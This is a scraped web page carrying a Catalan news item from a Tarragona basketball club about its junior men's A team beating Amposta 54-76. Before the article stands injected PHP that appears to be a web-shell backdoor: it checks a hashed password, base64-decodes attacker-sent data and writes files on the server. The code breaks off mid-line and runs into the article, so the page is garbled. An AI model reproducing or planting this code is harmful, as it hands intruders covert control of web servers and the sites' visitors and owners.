function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior masculí A sentencia en el tercer quart contra l'Amposta (54-76) - Tgn Bàsquet Club -

El júnior masculí A sentencia en el tercer quart contra l’Amposta (54-76)

Updated: desembre 1, 2015

L’equip júnior masculí A del TGN Bàsquet va vèncer amb claredat l’Amposta després de fer un gran tercer període. El conjunt que entrena Alfredo Faro es va imposar al seu rival des de la defensa i va superar moments difícils perquè, tot i començar molt bé el matx (14-24) va veure com els locals remuntaven (38-33 al descans). La força mental i la defensa plantejada pels tarragonins en el tercer quart va ser decisiu (parcial de 4-24) i l’Amposta ja no va tenir esma ni temps per reaccionar.